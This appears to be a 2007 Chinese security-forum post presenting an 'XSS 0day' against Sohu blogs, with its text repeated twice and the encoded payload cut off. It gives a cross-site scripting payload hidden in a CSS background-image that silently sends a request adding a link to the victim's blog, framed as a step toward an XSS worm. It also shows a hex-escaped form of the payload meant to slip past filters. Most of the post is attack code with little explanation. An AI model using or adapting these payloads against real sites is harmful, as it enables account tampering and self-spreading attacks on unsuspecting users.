XSS 0DAY代碼
更新時間:2007年03月08日 00:00:00 作者:
文章作者:茄子寶
信息來源:邪惡八進制信息安全團隊(www.eviloctal.com)
看到夢之光芒放出來了!我也不藏了!
10月7日的時候我就發(fā)的日志,提示了大家!這里算是上次發(fā)的XSS WORM初嘗試的續(xù)吧.
其實很簡單,就是兩次轉碼.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII轉碼參考 http://s0n9.blog.sohu.com/16002288.html
寫成下面16進制轉義字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
信息來源:邪惡八進制信息安全團隊(www.eviloctal.com)
看到夢之光芒放出來了!我也不藏了!
10月7日的時候我就發(fā)的日志,提示了大家!這里算是上次發(fā)的XSS WORM初嘗試的續(xù)吧.
其實很簡單,就是兩次轉碼.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII轉碼參考 http://s0n9.blog.sohu.com/16002288.html
寫成下面16進制轉義字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
相關文章
變態(tài)入侵之有史以來最酷的Windows后門sethc.exe
變態(tài)入侵之有史以來最酷的Windows后門sethc.exe...2007-11-11